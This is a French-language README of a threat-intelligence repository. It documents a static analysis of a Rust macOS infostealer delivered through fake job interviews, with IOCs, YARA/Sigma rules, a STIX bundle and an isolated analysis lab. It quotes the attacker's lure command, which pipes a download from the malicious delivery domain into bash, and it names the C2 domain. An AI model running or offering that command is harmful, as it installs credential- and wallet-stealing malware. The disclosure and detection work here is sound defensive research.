
Analyse statique complète du voleur d'informations HyperHives macOS Rust — 571 valeurs de configuration déchiffrées, infrastructure C2, attribution DPRK/Contagious Interview, règles YARA/Sigma, bundle STIX 2.1, couche ATT&CK Navigator
Renseignement sur les menaces : Infostealer binaire universel Rust pour macOS distribué via un faux pipeline d'entretien d'embauche sur Wellfound (anciennement AngelList). Le personnage de l'opérateur « Felix » d'« HyperHive » a incité les cibles à exécuter un installateur malveillant depuis
macos.hyperhives.net. Ce dépôt documente une analyse statique complète : 571 valeurs de configuration chiffrées récupérées, comprenant des URL C2, un DSN Sentry, et 276 ID d'extensions Chrome ciblées.
| SHA-256 de l'échantillon | 5c7385c3a4d919d30e81d851d87068dfcc4d9c5489f1c2b06da6904614bf8dd3 |
| Domaine C2 | cloudproxy.link |
| Domaine de livraison | macos.hyperhives.net |
| Plateforme d'appât | Wellfound (anciennement AngelList) |
| Personnage de l'opérateur | « Felix » chez « HyperHive » |
| VirusTotal | 9 / 63 détections |
| Classification | Divulgation publique / lot d'IOC |
| Dernière mise à jour | Avril 2026 |
| Fichier | Format | Objectif |
|---|---|---|
iocs.txt | Texte brut | Hachages, domaines, URLs, IPs, email, IDs Sentry — à coller dans des listes de blocage, MISP, OpenCTI |
yara_rules.yar | YARA 4.2+ | Correspondance de hachage d'échantillon connu + détections heuristiques de chaînes pour Mach-O |
sigma_rules.yml | Sigma | Règles de proxy, DNS et création de processus — ajustez logsource pour votre SIEM |
stix/bundle.json | STIX 2.1 | Paquet CTI lisible par machine avec indicateurs, SDO de logiciel malveillant, infrastructure, motifs ATT&CK et relations |
attack-navigator-layer.json | ATT&CK Navigator | Importez dans ATT&CK Navigator pour une couverture visuelle des techniques |
. ├── README.md # This report ├── iocs.txt # Flat IOC list ├── yara_rules.yar # YARA detection rules ├── sigma_rules.yml # Sigma detection rules ├── stix/ │ └── bundle.json # STIX 2.1 threat-intelligence bundle ├── attack-navigator-layer.json # ATT&CK Navigator layer ├── output/ │ ├── full_decrypted_config.json # Machine-readable decrypted configuration │ ├── iocs.json # Structured IOC export │ ├── c2_protocol.txt # C2 protocol field documentation │ ├── cargo_dependencies.txt # Embedded Rust crate list (97 crates) │ ├── source_map.txt # Reconstructed source-file layout │ └── targets.txt # Targeted applications and data paths ├── scripts/ │ ├── decrypt_all.py # Definitive config decryptor (Unicorn emulation) │ ├── analyze.py # Static analysis driver │ ├── extract_all.py # String and structure extractor │ ├── r2_analyze.py # Radare2 analysis automation │ ├── r2_targeted.py # Targeted R2 analysis for helpers │ └── validate_repo.py # CI validation script ├── sample/ │ └── README.md # Instructions for sample placement ├── Dockerfile # Analysis container image ├── docker-compose.yml # Air-gapped compose config ├── lab.sh # Helper script for Docker lab ├── SECURITY.md # Safe handling and vulnerability reporting ├── CONTRIBUTING.md # Contribution guidelines ├── CHANGELOG.md # Release history ├── LICENSE # MIT └── .github/ ├── workflows/validate.yml # CI: YARA + Sigma + file checks ├── ISSUE_TEMPLATE/ # Structured issue forms └── PULL_REQUEST_TEMPLATE.md # PR checklist
---
## Démarrage rapide
Placez l'échantillon en tant que `sample/installer_binary` (consultez [`sample/README.md`](https://github.com/darksp33d/hyperhives-macos-infostealer-analysis/blob/main/sample/README.md) pour la vérification de hachage), puis :```bash
docker compose build
docker compose run --rm lab python3 /lab/scripts/decrypt_all.py
Le fichier compose impose network_mode: none, read_only: true, et supprime toutes les capacités Linux. Voir SECURITY.md pour les directives complètes de gestion.
Une offre d'emploi sur Wellfound (anciennement AngelList) a conduit à une chaîne d'ingénierie sociale par plusieurs e-mails de la part d'un opérateur sous le personnage "Felix" chez "HyperHive". Après avoir flatté le parcours technique de la cible et planifié un faux entretien, l'attaquant a dirigé la victime pour « passer en revue le produit » sur hyperhives.net et examiner spécifiquement Paramètres → Diagnostics → Journal — un prétexte pour déclencher l'exécution de :```
curl -s https://macos.hyperhives.net/install | nohup bash &
La charge utile est un **binaire universel Mach-O de 8,5 Mo** (x86_64 + arm64) compilé en Rust. L’analyse statique avec un laboratoire Docker déconnecté et l’émulation CPU de **570 routines d’assistance x86_64 uniques** a récupéré **la totalité des 571 valeurs de configuration chiffrées**, révélant :
- **C2 :** `cloudproxy.link` — quatre points de terminaison HTTPS
- **Sentry (pivot d’attribution) :** DSN complet avec identifiants d’org/projet sur `ingest.de.sentry.io`
- **Identité de construction :** utilisateur Cargo `rootr`, nom de code `force`, version `9.12.1`
- **Cibles :** 276 identifiants d’extension Chrome (portefeuilles crypto, gestionnaires de mots de passe, identifiants d’entreprise)